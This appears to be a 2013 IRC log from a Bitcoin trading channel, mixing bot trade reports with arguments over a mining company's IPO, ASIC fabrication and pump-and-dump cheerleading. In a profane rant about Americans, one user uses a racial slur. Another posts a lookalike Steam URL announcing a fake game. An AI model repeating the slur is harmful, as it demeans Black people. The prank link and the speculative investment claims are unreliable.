02:37:52 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 28 02:37:53 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 28 02:38:08 shit gotta dump my PMBs and buy AMC Jun 28 02:38:18 someone dig up the entire garr must apologize drama for to make jwu feel better about his hurt butt. Jun 28 02:38:20 [BTCTC] [AMC-PT] 141 @ 0.00242 = 0.3412 BTC [-] Jun 28 02:38:23 [BTCTC] [AMC-PT] 3 @ 0.00242 = 0.0073 BTC [-] Jun 28 02:38:24 [BTCTC] [AMC-PT] 40 @ 0.002415 = 0.0966 BTC [-] Jun 28 02:38:25 [BTCTC] [AMC-PT] 1 @ 0.002413 BTC [-] Jun 28 02:38:27 [BTCTC] [AMC-PT] 14 @ 0.002412 = 0.0338 BTC [-] Jun 28 02:38:34 mircea_popescu, what was this drama? Jun 28 02:39:11 oh, BFL stuff Jun 28 02:39:13 totally. Jun 28 02:39:22 [MPEX] [S.MPOE] 6500 @ 0.00083266 = 5.4123 BTC [-] Jun 28 02:39:36 [MPEX] [S.MPOE] 4673 @ 0.00083181 = 3.887 BTC [-] Jun 28 02:39:37 [MPEX] [S.MPOE] 3800 @ 0.00083048 = 3.1558 BTC [-] Jun 28 02:40:01 has this happened to a btc stock before? falling priceon ame day ipo? Jun 28 02:40:15 same-day Jun 28 02:40:34 yes. Jun 28 02:40:37 did a tech post on AMC thread Jun 28 02:40:49 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Jun 28 02:41:01 u guys are missing this is ACE Jun 28 02:41:12 just because of eASIC Jun 28 02:43:14 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Jun 28 02:43:31 like Jun 28 02:43:38 there is no Mask xD Jun 28 02:43:41 [BTCTC] [AMC-PT] 13 @ 0.00245 = 0.0319 BTC [+] Jun 28 02:43:49 it's only metal layer customization Jun 28 02:44:04 they just build hundreds of equal wafers Jun 28 02:44:17 and do a specific litography for each client Jun 28 02:44:33 [BTCTC] [AMC-PT] 758 @ 0.00245 = 1.8571 BTC [+] Jun 28 02:44:37 because the wafers themselves are EQUAL for everyone Jun 28 02:44:51 and? Jun 28 02:44:55 ... Jun 28 02:45:09 means the fab process is very fast Jun 28 02:45:18 faster than any custom asic Jun 28 02:45:29 this is a semi-custom asic Jun 28 02:45:30 ok, cos i thought you trying to start a wafer revolt. Jun 28 02:45:38 lol Jun 28 02:45:43 so fast that you have to wait til Q1? Jun 28 02:45:57 [BTCTC] [ASICMINER-PT] 1 @ 3.392 BTC [-] Jun 28 02:46:05 that just depends on how quickly NRE is paid Jun 28 02:46:06 aren't asics old in about 4 months? Jun 28 02:46:18 deadweasel: 28nm ones? Jun 28 02:46:34 those would still be new Jun 28 02:46:39 They dont need to be old to be too late Jun 28 02:46:51 [BTCTC] [BITVPS] 50 @ 0.0011 = 0.055 BTC [+] Jun 28 02:46:53 [BTCTC] [BITVPS] 49 @ 0.001 = 0.049 BTC [-] Jun 28 02:46:54 [BTCTC] [BITVPS] 45 @ 0.001 = 0.045 BTC [-] Jun 28 02:46:59 .d Jun 28 02:46:59 19339258.27239 | Next Diff in 269 blocks | Estimated Change: 9.4770% in 1d 16h 19m 34s Jun 28 02:47:27 ThickAsThieves: you can not be too late when using the latest tech Jun 28 02:47:45 you'll benefit always Jun 28 02:47:45 nonsense Jun 28 02:47:49 vbs : 28nm metal-only does not compare with a good custom design Jun 28 02:48:12 mircea_popescu: not always true Jun 28 02:48:19 ... Jun 28 02:48:29 depends a lot on the semi-custom structure Jun 28 02:48:55 semi-custom uses a fixed logic structure Jun 28 02:48:57 [BTCTC] [CRYPTO-TRADE] 5 @ 0.249 = 1.245 BTC [+] Jun 28 02:49:06 i guess this is one of those questions the market is welcome to answer for me. Jun 28 02:49:17 think of it like HDD sectors Jun 28 02:49:24 the market only cares about brand names being quoted in forum threads Jun 28 02:49:31 u know that there's always some waste Jun 28 02:49:47 the amount of waste depends on the info and sector size Jun 28 02:49:49 this is the same Jun 28 02:49:56 [BTCTC] [AMC-PT] 86 @ 0.002412 = 0.2074 BTC [-] Jun 28 02:50:02 Vbs: yes we know. Its a hardcopy asic, they are not new Jun 28 02:50:24 [BTCTC] [AMC-PT] 7 @ 0.00241 = 0.0169 BTC [-] Jun 28 02:50:25 yep Jun 28 02:50:25 [BTCTC] [AMC-PT] 1 @ 0.0024 BTC [-] Jun 28 02:50:26 [BTCTC] [AMC-PT] 654 @ 0.002351 = 1.5376 BTC [-] Jun 28 02:50:36 so, take it out on the forum not us Jun 28 02:50:43 but they woll be new this winter Jun 28 02:50:48 will Jun 28 02:50:53 [BTCTC] [AMC-PT] 200 @ 0.00235 = 0.47 BTC [-] Jun 28 02:51:11 lol Jun 28 02:51:18 i like the aged cynicism developing in this kid. Jun 28 02:52:26 [BTCTC] [ASICMINER-PT] 1 @ 3.399 BTC [+] Jun 28 02:52:27 02:50:12 (6) Motion posted on DMS.SELLING: Proposal to Approve Just-Dice for Investment Jun 28 02:52:27 02:50:12 (829) Jun 28 02:52:33 you're probably wanted there too. Jun 28 02:54:35 600 of the yes votes were from me Jun 28 02:54:56 [BTCTC] [AMC-PT] 200 @ 0.002201 = 0.4402 BTC [-] Jun 28 02:54:58 [BTCTC] [AMC-PT] 1227 @ 0.0022 = 2.6994 BTC [-] Jun 28 02:55:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.03306 = 0.3306 BTC [+] Jun 28 02:55:51 Vbs honest question, are you excited because you own a ton of AMC shares or because you genuinely think they will be the next asicminer? Do you think the price of 0.0025 is fair? Jun 28 02:55:52 [BTCTC] [TAT.ASICMINER] 20 @ 0.0331 = 0.662 BTC [+] Jun 28 02:56:08 [BTCTC] [COGNITIVE] 1 @ 0.52 BTC [+] Jun 28 02:56:10 [BTCTC] [COGNITIVE] 3 @ 0.533754 = 1.6013 BTC [+] Jun 28 02:56:20 [BTCTC] [COGNITIVE] 2 @ 0.534 = 1.068 BTC [+] Jun 28 02:56:26 ofc is fair Jun 28 02:56:30 look at it go Jun 28 02:57:05 chsados: I am genuinely excited Jun 28 02:57:08 Vbs seems to tbe the most vocal cheerleader for AMC Jun 28 02:57:09 [BTCTC] [COGNITIVE] 1 @ 0.534 BTC [+] Jun 28 02:57:20 lets get one thing straigh Jun 28 02:57:22 0.0023 Jun 28 02:57:29 0.0022 Jun 28 02:57:39 we are on the same BOAT as one of the BEST asic companies out there!!!! Jun 28 02:57:45 [BTCTC] [AMC-PT] 5 @ 0.0023 = 0.0115 BTC [+] Jun 28 02:57:51 just read news about it! Jun 28 02:57:56 is that the boat that isnt a boat Jun 28 02:58:04 ... Jun 28 02:58:10 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [+] Jun 28 02:58:19 http://www.lonelyislandvideos.com/wp-content/uploads/2009/11/im-on-a-boat_2.jpg Jun 28 02:58:21 dude, stop with the crap. you will absolutely not make any friends with the sort of attitude here. Jun 28 02:58:29 save it for the retarded press or conferences or w/e Jun 28 02:58:33 and the boat is named the Titasic Jun 28 02:58:39 vbs bought at 5 he'll be fine Jun 28 02:58:46 mircea_popescu: me? Jun 28 02:58:47 its just the cycle of bitcoin continuing Jun 28 02:58:49 yes you. Jun 28 02:59:18 mircea_popescu: and what is my attitude? Jun 28 02:59:28 look something I didnt know about, let me get my wallet Jun 28 02:59:37 "we're in the same boat as the guys that did it because i heard about hardcopy and am really excited" Jun 28 02:59:51 to begin with, i don't even know wtf you are, so you don't have the right to be excited in the first place. Jun 28 02:59:55 cheerleading Jun 28 03:00:04 Vbs but is it fair to bankroll the outfit with an inflated ipo? Jun 28 03:00:16 mircea_popescu: ... Jun 28 03:00:27 [BTCTC] [S.DICE-PT] 1 @ 0.002048 BTC [-] Jun 28 03:00:43 well matybe i've missed something here. Jun 28 03:00:46 Vbs: to put it politely, what AMC is right now is a thread on one of the shittiest websites ever, we have seen many of these before that amounted to nothing except poorer idiots Jun 28 03:00:48 ;;gettrust Vbs Jun 28 03:00:49 Trust relationship from user mircea_popescu to user Vbs: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=Vbs Jun 28 03:01:07 nope, not missed anything. Jun 28 03:01:18 [BTCTC] [DMS.MINING] 20 @ 0.020201 = 0.404 BTC [-] Jun 28 03:01:46 dont forget to check Trust 2.0 Jun 28 03:01:52 [BTCTC] [AMC-PT] 273 @ 0.0022 = 0.6006 BTC [-] Jun 28 03:01:59 my trust is old school. Jun 28 03:02:21 Vbs: cheerleading, astrotrufing, whiteknighting for stuff that, on probability aloe, is a scam doesnt earn friends in many places, least of all here Jun 28 03:02:46 Vbs but is it fair to bankroll the outfit with an inflated ipo? i ask once more :D Jun 28 03:02:57 very well Jun 28 03:03:01 chsados how do you figure he's bankrolling anything anyway ? Jun 28 03:03:10 excited kid. not a cost in any sense. Jun 28 03:03:15 good point but giving benefit of the doubt Jun 28 03:03:17 [HAVELOCK] [ASICM] 85 @ 0.03200201 = 2.7202 BTC [-] Jun 28 03:03:21 chsados: ask in #bitfunder Jun 28 03:03:27 [HAVELOCK] [ASICM] 10 @ 0.03200201 = 0.32 BTC [-] Jun 28 03:03:47 im asking you since you are clearly the lead cheerleader for AMC in the thread Jun 28 03:04:42 yes, I've seen where that is leading me Jun 28 03:04:45 here Jun 28 03:04:47 and your last post implys you trust AMC over KNC when all AMC has is 6 avalons... Jun 28 03:04:56 so I'll answer you in pvt Jun 28 03:05:05 ok Jun 28 03:05:11 http://www.reddit.com/r/Bitcoin/comments/1h7qlk/another_physical_place_accepting_bitcoin_in/ Jun 28 03:05:22 [BTCTC] [AMC-PT] 1000 @ 0.002136 = 2.136 BTC [-] Jun 28 03:05:30 i can easily see why he'd trust amc over knc Jun 28 03:05:39 or bdd nqp lsr trv etc Jun 28 03:06:14 jurov ^ bratislava has bitcoin ?!!?!? Jun 28 03:07:34 [BTCTC] [PAJKA.BOND] 1 @ 0.0605 BTC [+] Jun 28 03:08:19 [BTCTC] [AMC-PT] 10 @ 0.002136 = 0.0214 BTC [-] Jun 28 03:09:42 in other news jd passed 20k Jun 28 03:09:45 [BTCTC] [BTC-BOND] 23 @ 0.01 = 0.23 BTC [+] Jun 28 03:10:23 impressive Jun 28 03:10:37 time to budget for a bodyguard Jun 28 03:11:30 yeah, he has to take some measures to avoid falling in the tarpits of success. Jun 28 03:11:40 [BTCTC] [AMC-PT] 1 @ 0.002 BTC [-] Jun 28 03:11:42 [BTCTC] [AMC-PT] 500 @ 0.002 = 1 BTC [-] Jun 28 03:11:42 [BTCTC] [AMC-PT] 1 @ 0.002 BTC [-] Jun 28 03:11:44 [BTCTC] [AMC-PT] 20 @ 0.002 = 0.04 BTC [-] Jun 28 03:12:08 mircea_popescu: are you like this with everybody btw? Jun 28 03:12:27 hehehe Jun 28 03:12:34 Does asicminer have stock of their rigs lately? Jun 28 03:12:42 wha? Jun 28 03:12:59 can i buy asicminer rig Jun 28 03:13:05 [MPEX] [S.MPOE] 3177 @ 0.00082943 = 2.6351 BTC [-] Jun 28 03:13:08 no Jun 28 03:13:15 not form asicminer at least Jun 28 03:13:22 some people are selling used ones Jun 28 03:13:29 and asicminer has usbminers in stock Jun 28 03:14:00 hmmm... how long of a wait till the restock the rigs? Jun 28 03:14:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004898 BTC [+] Jun 28 03:14:48 Vbs: yes Jun 28 03:15:57 loorb 1-2 weeks Jun 28 03:16:10 ty Jun 28 03:16:12 np Jun 28 03:17:18 so i have gotten direct apologies from almost every single person that attacked me and my PMB last week Jun 28 03:17:34 unexpected Jun 28 03:18:53 yes. Jun 28 03:19:27 ThickAsThieves prepare for next week. Jun 28 03:19:42 indeed Jun 28 03:20:04 by now hopefully the most vocal ones have moved to AMC Jun 28 03:20:28 [BTCTC] [AMC-PT] 43 @ 0.00242 = 0.1041 BTC [+] Jun 28 03:20:29 lol Jun 28 03:20:29 [BTCTC] [DMS.SELLING] 11 @ 0.032 = 0.352 BTC [+] Jun 28 03:20:51 [BTCTC] [AMC-PT] 87 @ 0.00242 = 0.2105 BTC [+] Jun 28 03:21:01 lmao Jun 28 03:21:07 [BTCTC] [DMS.SELLING] 10 @ 0.033189 = 0.3319 BTC [+] Jun 28 03:21:09 [BTCTC] [DMS.SELLING] 1 @ 0.03319 BTC [+] Jun 28 03:21:56 http://storestteampowered.com/app/4411/ Jun 28 03:21:58 Half-Life 2: Episode Three on Steam Jun 28 03:21:59 actually, hopefully to DMS, I'd be interested to see how Deprived handles the mob Jun 28 03:23:18 [BTCTC] [AMC-PT] 1 @ 0.00242 BTC [+] Jun 28 03:23:28 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Jun 28 03:23:29 [BTCTC] [AMC-PT] 1 @ 0.00242 BTC [+] Jun 28 03:23:41 [BTCTC] [AMC-PT] 61 @ 0.00242 = 0.1476 BTC [+] Jun 28 03:24:06 [MPEX] [S.MPOE] 2800 @ 0.00083673 = 2.3428 BTC [+] Jun 28 03:24:23 [BTCTC] [AMC-PT] 807 @ 0.00242 = 1.9529 BTC [+] Jun 28 03:24:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.033448 = 1.6724 BTC [+] Jun 28 03:25:47 [BTCTC] [AMC-PT] 1 @ 0.00243 BTC [+] Jun 28 03:26:22 [BTCTC] [AMC-PT] 585 @ 0.00242 = 1.4157 BTC [-] Jun 28 03:26:59 so i have gotten direct apologies from almost every single person that attacked me and my PMB last week <- I have not :-( Jun 28 03:27:27 ThickAsThieves: lucky you Jun 28 03:27:41 I havent gotten any apologies from people who said I was wrong about BFL Jun 28 03:28:59 Diablo, Eposide 3 news is beyond awesome. Jun 28 03:29:42 agreed, finally it's coming Jun 28 03:29:47 furuknap: its a fake site ;) Jun 28 03:30:08 hahahaha Jun 28 03:30:11 It is? Jun 28 03:30:15 you got me :( Jun 28 03:30:17 lol Jun 28 03:30:23 Bah... Jun 28 03:30:25 ThickAsThieves: pm Jun 28 03:30:32 Deprived vs MPEX https://bitcointalk.org/index.php?topic=244316.msg2599111#msg2599111 Jun 28 03:30:36 Begin! Jun 28 03:30:43 ok so i have a fucking inclarity in my head. Jun 28 03:30:54 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [+] Jun 28 03:30:56 so americans fucking worship stars. idiots like oprah or whatever, regis and cathy lee. Jun 28 03:31:02 i don't Jun 28 03:31:04 o must buy this book cause it was on oprah's book club Jun 28 03:31:05 im merican Jun 28 03:31:08 bear with me deadweasel Jun 28 03:31:16 can't cos I break your theory Jun 28 03:31:18 now, it takes no skill and no ability to be fucking regis Jun 28 03:31:23 a goart in a costume could be regis Jun 28 03:31:38 on the OTHER HAND, americans fucking belive they personally are at least in the same boat as buffett Jun 28 03:31:49 it DOES take motherfucking skill and a boatload of luck to be buffett Jun 28 03:31:51 and i don't get it. Jun 28 03:31:52 i don't know any of them. Jun 28 03:31:55 what in the eff. Jun 28 03:32:09 i know real people. Jun 28 03:32:16 don't have no tv Jun 28 03:32:21 It's aspiration. They see no difference between star A and star B. Jun 28 03:32:32 so then why the fuck do they worship them Jun 28 03:32:55 worship fucking dimon, at least he's doing something. Jun 28 03:33:05 It's not all muricans, though. We get the propaganda picture of it, given to us by the people who want the propaganda to succeed. Most muricans I've known are nothing like the stereotype. Jun 28 03:33:17 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [+] Jun 28 03:33:19 [HAVELOCK] [ASICM] 32 @ 0.032999 = 1.056 BTC [+] Jun 28 03:33:26 our government, you can have them. string'em all up. Jun 28 03:33:27 the problem is the culture Jun 28 03:33:32 so nobody watches oprah is the contention furuknap ? Jun 28 03:33:34 is taught incompeletly Jun 28 03:33:35 society too Jun 28 03:33:35 how do the books sell ? Jun 28 03:33:38 The problem is the attitude. Jun 28 03:33:51 the words told to children are Jun 28 03:33:54 you can be anything Jun 28 03:34:01 you deserve everythin Jun 28 03:34:02 g Jun 28 03:34:05 but Jun 28 03:34:06 You don't have to agree with me, TAT, but if you don't I'll just depose you and put some puppet in who agres with me. Jun 28 03:34:17 they dont properly communicate how to be and get those things Jun 28 03:34:18 but why do they worship 0 accomplishment and think they;re equal or above to 1 accomplishment ? Jun 28 03:34:19 attitude is the end product. the beginnings are conditioning and oaths. Jun 28 03:34:24 this is selfinconsistent! Jun 28 03:34:27 MP: No, lots of people do. Jun 28 03:34:29 [BTCTC] [AMC-PT] 76 @ 0.00242 = 0.1839 BTC [-] Jun 28 03:34:37 either worship nothing Jun 28 03:34:45 or else lick the fucking toilets in jpm Jun 28 03:34:55 [BTCTC] [AMC-PT] 10 @ 0.00243 = 0.0243 BTC [+] Jun 28 03:35:22 My point is, they don't worship star A or star B, they worship aspiration. They crave someone to be more than they are so they can feel the have the ability to accomplish something. Jun 28 03:35:51 we muricans are NOT this interesting. i guarantee you. Jun 28 03:35:55 no, imo they worship the actual stars. Jun 28 03:36:02 Because if someone can accomplish something they haven't, they still have a chance and thus don't have to do anything right now. Jun 28 03:36:30 [BTCTC] [TAT.ASICMINER] 43 @ 0.033859 = 1.4559 BTC [+] Jun 28 03:36:32 what they worship is laziness Jun 28 03:36:38 luck Jun 28 03:36:39 etc Jun 28 03:36:41 TAT: Exactly. Jun 28 03:36:50 got me there. Jun 28 03:36:54 heh. Jun 28 03:36:59 the worship is jealousy Jun 28 03:37:00 i guess thios actyually fucking answers it. Jun 28 03:37:01 not respect Jun 28 03:37:04 what they worship is lazyness. Jun 28 03:37:18 that's why oprah and the nigger cook woman. because nothing there. Jun 28 03:37:27 thanks. Jun 28 03:37:32 They crave laziness by worshipping someone who shows them there's no rush to accomplish anything. Jun 28 03:37:35 np. post it Jun 28 03:37:39 lol. Jun 28 03:37:42 work smart, not hard. Jun 28 03:37:46 he can post it, he got it. Jun 28 03:38:10 ha, furuknap what's your blog url? Jun 28 03:38:30 I have several. Coinblog is at http://coin.furuknap.net/ Jun 28 03:38:45 And I won't be blogging that :-) Jun 28 03:39:12 i hope not, nice setup. it doesn't bleed my eyes. Jun 28 03:39:14 [BTCTC] [AMC-PT] 10 @ 0.002429 = 0.0243 BTC [-] Jun 28 03:39:31 oh, now it is. so much red. fark Jun 28 03:39:48 It's the default WP3.6 theme :-) Jun 28 03:39:48 ah, hide the header, better. Jun 28 03:40:06 I'm not a designer, I take no credit or blame. Jun 28 03:40:27 [BTCTC] [TAT.ASICMINER] 15 @ 0.033203 = 0.498 BTC [-] Jun 28 03:40:39 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [-] Jun 28 03:41:53 [BTCTC] [AMC-PT] 205 @ 0.002429 = 0.4979 BTC [-] Jun 28 03:42:14 no worries, i have terrible taste. Jun 28 03:43:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.033203 BTC [-] Jun 28 03:43:51 [BTCTC] [AMC-PT] 100 @ 0.00242 = 0.242 BTC [-] Jun 28 03:44:03 [BTCTC] [TAT.ASICMINER] 28 @ 0.033203 = 0.9297 BTC [-] Jun 28 03:44:59 [BTCTC] [AMC-PT] 394 @ 0.002429 = 0.957 BTC [+] Jun 28 03:47:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.0336 = 0.0672 BTC [+] Jun 28 03:50:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0336 BTC [+] Jun 28 03:50:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.033899 = 0.8475 BTC [+] Jun 28 03:52:52 [HAVELOCK] [SDICE] 1 @ 0.182001 BTC [-] Jun 28 03:54:21 [HAVELOCK] [SDICE] 1 @ 0.182001 BTC [-] Jun 28 03:57:40 pants off friday Jun 28 03:57:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004898 BTC [+] Jun 28 03:57:53 [MPEX] [S.MPOE] 14800 @ 0.00083673 = 12.3836 BTC [+] Jun 28 03:58:37 [BTCTC] [PAJKA.BOND] 1 @ 0.0605 BTC [+] Jun 28 03:59:20 [BTCTC] [ASICMINER-PT] 3 @ 3.39 = 10.17 BTC [-] Jun 28 03:59:25 [BTCTC] [AMC-PT] 7 @ 0.002429 = 0.017 BTC [+] Jun 28 03:59:44 started reading that link tat did, I guess everyone though asicminer was a bad investment in the beginning Jun 28 03:59:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.033795 = 0.2028 BTC [-] Jun 28 03:59:54 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.004898 = 0.4849 BTC [+] Jun 28 04:00:24 [BTCTC] [AMC-PT] 1442 @ 0.002429 = 3.5026 BTC [+] Jun 28 04:00:26 [BTCTC] [AMC-PT] 1852 @ 0.00243 = 4.5004 BTC [+] Jun 28 04:00:31 [BTCTC] [AMC-PT] 706 @ 0.00245 = 1.7297 BTC [+] Jun 28 04:00:56 [BTCTC] [DMS.MINING] 1 @ 0.020201 BTC [-] Jun 28 04:01:58 [MPEX] [S.MPOE] 5100 @ 0.00083673 = 4.2673 BTC [+] Jun 28 04:02:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004898 BTC [+] Jun 28 04:03:16 which fund is deprived run? Jun 28 04:03:34 [BTCTC] [DMS.MINING] 7 @ 0.020201 = 0.1414 BTC [-] Jun 28 04:03:36 [BTCTC] [DMS.MINING] 2 @ 0.0202 = 0.0404 BTC [-] Jun 28 04:03:37 [BTCTC] [DMS.MINING] 1 @ 0.02013 BTC [-] Jun 28 04:05:01 [BTCTC] [DMS.MINING] 24 @ 0.020129 = 0.4831 BTC [-] Jun 28 04:05:03 [BTCTC] [DMS.MINING] 1 @ 0.020128 BTC [-] Jun 28 04:05:04 [BTCTC] [DMS.MINING] 1 @ 0.020128 BTC [-] Jun 28 04:05:06 [BTCTC] [DMS.MINING] 1 @ 0.020128 BTC [-] Jun 28 04:06:47 [BTCTC] [B.YABMC] 10 @ 0.0095 = 0.095 BTC [+] Jun 28 04:06:48 [BTCTC] [AMC-PT] 2 @ 0.00245 = 0.0049 BTC [+] Jun 28 04:08:01 [BTCTC] [AMC-PT] 200 @ 0.00245 = 0.49 BTC [+] Jun 28 04:09:57 [BTCTC] [BTC-TRADING-PT] 8 @ 0.6634 = 5.3072 BTC [+] Jun 28 04:12:34 AM was quite different, they did one (1) round of IPO with a simple business case Jun 28 04:12:53 [BTCTC] [AMC-PT] 92 @ 0.00245 = 0.2254 BTC [+] Jun 28 04:13:17 the vehicle for the IPO promptly assploded leaving any further dialogue or pump and dump cycles redundant Jun 28 04:13:47 [BTCTC] [AMC-PT] 100 @ 0.00249 = 0.249 BTC [+] Jun 28 04:13:50 [BTCTC] [AMC-PT] 306 @ 0.00249 = 0.7619 BTC [+] Jun 28 04:13:53 some moons later the quietly pwned the mining landscape Jun 28 04:14:50 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.004954 = 0.1486 BTC [+] Jun 28 04:17:21 [BTCTC] [S.DICE-PT] 1 @ 0.002299 BTC [+] Jun 28 04:18:07 [BTCTC] [AMC-PT] 77 @ 0.00249 = 0.1917 BTC [+] Jun 28 04:21:10 [MPEX] [S.MPOE] 26876 @ 0.00083458 = 22.4302 BTC [-] Jun 28 04:21:15 [MPEX] [S.MPOE] 7124 @ 0.0008295 = 5.9094 BTC [-] Jun 28 04:22:56 anyone who checks bitbet proposals around? Jun 28 04:23:20 mircea_popescu does afaik Jun 28 04:23:24 i heard. Jun 28 04:24:14 I just made a kinda dupe Jun 28 04:24:25 I guess they will see it when they do Jun 28 04:25:14 dupe means ass in serbian Jun 28 04:25:49 ass means ass in english Jun 28 04:25:50 what is the word for duplicate? Jun 28 04:25:59 oh freenode Jun 28 04:26:04 [BTCTC] [AMC-PT] 1 @ 0.00249 BTC [+] Jun 28 04:27:12 bitcoin finance in one post: https://bitcointalk.org/index.php?topic=99497.msg2597135#msg2597135 Jun 28 04:27:47 lol Jun 28 04:28:57 lol Jun 28 04:29:59 ha Jun 28 04:30:43 .bait Jun 28 04:30:47 http://24.media.tumblr.com/tumblr_ks898wjeg61qzr53co1_1280.png Jun 28 04:31:52 [BTCTC] [RSM] 10 @ 0.02101 = 0.2101 BTC [-] Jun 28 04:31:55 [BTCTC] [RSM] 1 @ 0.0191 BTC [-] Jun 28 04:32:03 [BTCTC] [RSM] 10 @ 0.019051 = 0.1905 BTC [-] Jun 28 04:32:51 [MPEX] [S.MPOE] 17800 @ 0.00083673 = 14.8938 BTC [+] Jun 28 04:33:56 [BTCTC] [AMC-PT] 150 @ 0.00249 = 0.3735 BTC [+] Jun 28 04:37:18 poggy so if you did it just gets discarded Jun 28 04:37:43 to check out the finance or the bait. Jun 28 04:37:45 decissions... Jun 28 04:39:02 [BTCTC] [AMC-PT] 77 @ 0.00249 = 0.1917 BTC [+] Jun 28 04:39:08 [HAVELOCK] [VTX] 1 @ 0.517999 BTC [+] Jun 28 04:39:15 my link explains AMC Jun 28 04:39:22 [BTCTC] [AMC-PT] 80 @ 0.00249 = 0.1992 BTC [+] Jun 28 04:40:28 Time for Daily Newslinks, brought to you by me Jun 28 04:40:33 http://investigations.nbcnews.com/_news/2013/06/27/19174350-ex-pentagon-general-target-of-leak-investigation-sources-say Jun 28 04:40:42 heh. Jun 28 04:40:46 Ex-Pentagon general target of leak investigation, sources say Jun 28 04:41:13 http://www.brookings.edu/events/2013/06/27-defense-cybersecurity-dempsey#ref-id=20130627_fullevent Jun 28 04:41:21 US Defense Department developing secure 4G network and updating rules for cyberwarfare Jun 28 04:41:25 [BTCTC] [DMS.MINING] 1 @ 0.0205 BTC [+] Jun 28 04:41:43 http://www.polygon.com/2013/6/27/4471992/google-android--console Jun 28 04:42:40 hmm Chrome is farting out on me mid-broadcast Jun 28 04:43:23 [MPEX] [S.MPOE] 576 @ 0.0008295 = 0.4778 BTC [-] Jun 28 04:43:24 [MPEX] [S.MPOE] 2574 @ 0.00082776 = 2.1307 BTC [-] Jun 28 04:43:38 http://thegenesisblock.com/off-chain-micropayments-implemented-in-bitcoinj/ Jun 28 04:43:40 Off-chain Bitcoin Micropayments Implemented in Bitcoinj - The Genesis Block - The Genesis Block Jun 28 04:44:06 http://www.theverge.com/2013/6/27/4466280/brain-eating-amoeba-increasing-with-climate-change Jun 28 04:44:09 Brain-eating amoebas thrive in US lakes as global warming heats waterways | The Verge Jun 28 04:44:36 http://www.forbes.com/sites/jonmatonis/2013/06/27/bitcoin-payments-could-quickly-become-competitive-wedge-in-online-gaming/ Jun 28 04:44:39 Bitcoin Payments Could Quickly Become Competitive Wedge In Online Gaming - Forbes Jun 28 04:44:57 [BTCTC] [ASICMINER-PT] 1 @ 3.390001 BTC [+] Jun 28 04:46:11 could ? Jun 28 04:46:12 lol. Jun 28 04:46:23 http://www.aljazeera.com/news/americas/2013/06/201362763318124306.html Jun 28 04:46:27 Texas carries out 500th execution - Americas - Al Jazeera English Jun 28 04:47:13 that's all i got for today Jun 28 04:47:16 [BTCTC] [AMC-PT] 337 @ 0.00249 = 0.8391 BTC [+] Jun 28 04:48:41 [HAVELOCK] [ASICM] 50 @ 0.0325 = 1.625 BTC [-] Jun 28 04:50:01 [BTCTC] [S.DICE-PT] 2 @ 0.002048 = 0.0041 BTC [-] Jun 28 04:57:31 [BTCTC] [AMC-PT] 60 @ 0.002489 = 0.1493 BTC [-] Jun 28 04:57:38 [HAVELOCK] [ASICM] 43 @ 0.032002 = 1.3761 BTC [-] Jun 28 04:57:40 [HAVELOCK] [ASICM] 9 @ 0.032001 = 0.288 BTC [-] Jun 28 04:57:41 [HAVELOCK] [ASICM] 1 @ 0.032 BTC [-] Jun 28 04:57:42 [HAVELOCK] [ASICM] 500 @ 0.0317 = 15.85 BTC [-] Jun 28 04:57:42 [HAVELOCK] [ASICM] 200 @ 0.03165 = 6.33 BTC [-] Jun 28 04:57:43 [HAVELOCK] [ASICM] 413 @ 0.0316 = 13.0508 BTC [-] Jun 28 04:57:50 [BTCTC] [TAT.ASICMINER] 11 @ 0.033742 = 0.3712 BTC [-] Jun 28 04:59:07 [MPEX] [S.MPOE] 3326 @ 0.00082776 = 2.7531 BTC [-] Jun 28 04:59:09 [MPEX] [S.MPOE] 9400 @ 0.00082741 = 7.7777 BTC [-] Jun 28 04:59:11 [MPEX] [S.MPOE] 9574 @ 0.00082689 = 7.9166 BTC [-] Jun 28 05:00:23 [BTCTC] [ASICMINER-PT] 2 @ 3.390001 = 6.78 BTC [+] Jun 28 05:00:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.033742 = 0.2362 BTC [-] Jun 28 05:03:43 Competitive Wedge? not Edge? Jun 28 05:04:39 do drug users care how they pay for their drugs? I don't think gamblers care either Jun 28 05:05:13 Up to 9.76 BTC a day. Jun 28 05:05:34 gambling or drugs? Jun 28 05:06:17 gambling Jun 28 05:06:26 that's a big drug habit, tolerable on gambling Jun 28 05:06:38 ah, that's healthy then Jun 28 05:11:23 [BTCTC] [BASIC-MINING] 1 @ 1.860069 BTC [-] Jun 28 05:11:57 [BTCTC] [AMC-PT] 20 @ 0.002489 = 0.0498 BTC [-] Jun 28 05:12:57 [HAVELOCK] [VTX] 1 @ 0.517999 BTC [+] Jun 28 05:13:29 [BTCTC] [TAT.ASICMINER] 21 @ 0.033742 = 0.7086 BTC [-] Jun 28 05:15:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0338 BTC [+] Jun 28 05:15:40 ;;ticker Jun 28 05:15:41 MtGox BTCUSD ticker | Best bid: 99.58900, Best ask: 99.69999, Bid-ask spread: 0.11099, Last trade: 99.70000, 24 hour volume: 19030.62265387, 24 hour low: 99.30000, 24 hour high: 103.59000, 24 hour vwap: 101.49282 Jun 28 05:17:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.0339 = 0.1695 BTC [+] Jun 28 05:21:58 [BTCTC] 